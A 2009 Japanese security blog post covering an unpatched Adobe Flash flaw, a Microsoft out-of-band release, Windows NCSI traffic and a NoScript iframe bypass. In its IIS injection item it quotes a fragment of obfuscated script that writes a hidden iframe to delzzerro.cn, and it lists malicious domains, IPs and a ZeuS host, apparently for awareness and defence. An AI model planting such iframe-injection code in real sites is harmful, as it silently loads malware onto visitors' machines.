2009.07.26 SUN
幽霊の日
東海道四谷怪談の初演
文政8年(1825年)7月26日
文政8年(1825年)7月26日
----------
このblogを始めたときは、単なる備忘録でした。その後、ウィルスを踏んづけたり、架空請求に引っかかったりした愉快な仲間のために様々なことを書いてきました。最近はもうセキュリティの話しかしてませんね(苦笑)
ひょっとしたら幽霊にでも祟られているのかもしれないと思う今日この頃・・・・
-----------
一つ積んでは・・・・
↑コレが何の問題もなく再生できる人、現状の認識を行っていますか?
Adobe Flash Player および他の Adobe 製品に影響を及ぼす Adobe Flash の脆弱性2009年7月24日現在、対策方法はありません。
対策版が公開されるまでの間、以下の回避策を適用することで、本脆弱性の影響を軽減することが可能です。
・Flash プラグインを無効にする
Adobe Flash に脆弱性2009年7月24日現在、対策方法はありません。
対策版が公開されるまでの間、以下の回避策を適用することで、本脆弱性の影響を軽減することが可能です。
・ウェブブラウザ上で Flash コンテンツ再生を無効にする
・Adobe Reader で Flash および 3D & Multimedia を無効にする
Update on Adobe Reader, Acrobat and Flash Player IssueWe are in the process of developing a fix for the issue, and expect to provide an update for Flash Player v9 and v10 for Windows, Macintosh, and Linux by July 30, 2009 (the date for Flash Player v9 and v10 for Solaris is still pending). We expect to provide an update for Adobe Reader and Acrobat v9.1.2 for Windows, Macintosh, and UNIX by July 31, 2009.
----------
二つ積んでは・・・
2009年7月29日のセキュリティリリース予定 (定例外)小野寺です。
7月15日に、月例のセキュリティ リリースを行いましたが、それとは別に7月29日に定例外でセキュリティリリースを行います。定例外で公開する理由については現時点ではお話しませんが、公開時にはご説明したいと思っています。
公開するセキュリティ情報は、2 件 (緊急 1 件, 警告 1 件) となります。
| Visual Studio | 警告 | リモートでコードが実行される |
| Internet Explorer | 緊急 | リモートでコードが実行される |
コレと関係あるのかどうかは不明ですが・・・----------
Microsoft™ DDoS attack(?)
別に攻撃する意図はないのでしょうが・・
www.msftncsi.com知りませんでした、、、マイクロソフト、、、、、
最初にこのトラフィックをみたときはウィルス感染かと思いました。
要は勝手にwww.msftncsi.cpm/ncsi.txtにGETリクエスト飛ばしたり
dns.msftncsi.comの名前解決をしようとするんですね。
----------
セキュリーナ復活
経済産業省 CHECK PC!更新情報 2009年5月29日 サイト再オープンしました。
って・・そんだけ?(苦笑)
----------
IIS (injection increases slightly)
delzzerro 系
sc ript>document.write(“<if” <ins>“r” +"a"</ins>"m"+"e" <in/s>" s"</ins>"r"+"c"+"="+ "h"+ "t"+"t"+"p"+ “:”+ “/”+ “/d”+ “e” +"l"+"z"+"z" <ins>“e” +"r" +"ro" +"."</ins>“c” <ins>“n” +"/ he"</ins>“i” <ins>“g” +"ht="</ins>“1 wid”<ins>“th”</ins> “=”+"1"+">"+"<"+ “/”<ins>“if”</ins> “r” <ins>“a”</ins> "me
delzzerro.cn91.212.198.37
AS49314
NEVAL要するに microsoft.cn系 です
--
8080系(どこの電車だ・・)
xb5.ru:8080
q0k.ru:8080
x8v.ru:8080
b1a.at:8080
u8i.ru:8080
x1i.ru:8080
x8o.ru:8080
xf7.in:8080
x0a.in:8080
q3t.in:8080
以下延々と続く・・・
78.47.25.168
AS24940
HETZNER (FastVPS Ltd)91.121.86.130
91.121.89.185
91.121.146.101
91.121.167.41
91.121.174.19
94.23.47.47
213.251.165.29
213.251.176.169
AS16276
OVH (OVH SAS)80.93.90.88
AS21409
IKOULA79.170.89.217
AS35470
XL Network92.51.146.237
AS20773
HOSTEUROPE91.82.250.52
AS12301
INVITEL (Activesoft Kft.)85.25.236.236
AS8972
PLUSSERVER82.165.8.58
87.106.242.144
AS8560
SCHLUND (1&1 Internet AG)212.95.57.201
AS28753
NETDIRECT (Infinite Technologies)87.242.98.116
87.242.98.192
90.156.144.78
AS25532
MASTERHOST62.109.21.254
AS29182
ISPSYSTEM77.37.17.170
77.37.19.173
77.37.19.179
77.37.19.205
77.37.20.130
77.37.21.166
AS44146
STARHOSTING194.105.128.34
AS8315
ARGEWEB87.106.242.144
AS12968
CDP (1&1 Internet AG)--
ZeuS/Zbot系
71spice.info
AS8206
JUNIK マタオマエカ(*repeated)
その他多数
どこが slightly なんだよ!? という突っ込みは受け付けません。
----------
NoScript のiframe問題がどんどん悪化中
NoScript単体でIFRAME禁止のすり抜けを確認 その4新規タブで開いた場合でも思いっきりバイパスするようになりました・・・
これじゃ怖くてセキュ系のサイト踏めないですよ(苦笑)
しょうがないから CentOS上で書いてます。
あーemacsつかいにくい(泣)
NoScriptのフォーラムではちょっと毛色の違う話が書かれていますが、
Fx2 post 1.9.5 iframe regressionこんな特殊な環境化じゃないんですけどね・・
ひょっとして JP版でしかおきてないのかな?
----------
EoF